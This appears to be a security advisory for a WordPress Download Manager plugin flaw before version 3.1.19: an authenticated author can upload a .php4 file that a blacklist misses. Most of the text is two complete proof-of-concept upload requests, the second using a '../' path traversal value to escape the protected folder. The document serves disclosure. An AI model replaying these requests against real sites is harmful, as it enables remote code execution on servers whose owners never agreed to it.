Download Manager < 3.1.19 – Authenticated (author+) PHP4 File Upload to RCE

Description

The wpdm_admin_upload_file AJAX action used a blacklist approach to forbid potential dangerous files, such as PHP, from being uploaded. However, other dangerous extensions, like .php4 were not forbidden.

Proof of Concept

As an author (or any account with the upload_files capability), attach a .php4 file to a download (/wp-admin/post-new.php?post_type=wpdmpro)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 518
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="test.php4"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be located at https://example.com/wp-content/uploads/download-manager-files/test.php4

Even though the plugin has an .htaccess to prevent access to files in /uploads/download-manager-files/, (which will only work on Apache web servers, leaving IIS and Nginx unprotected), the protection can be bypasssed via a path traversal vector to make the file go in another arbitrary folder when using the chunks handler

POST /wp-admin/admin-ajax.php?chunks=1 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315
Content-Length: 634
Connection: close
Cookie: [author+]

-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="name"

../test.php4
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="_ajax_nonce"

922675e67c
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="action"

wpdm_admin_upload_file
-----------------------------380248545020708884002749165315
Content-Disposition: form-data; name="package_file"; filename="whatever"
Content-Type: text/php

<?php echo 'FAILED'; ?>

-----------------------------380248545020708884002749165315--


The file will be at https://example.com/wp-content/uploads/test.php4 and accessible to anyone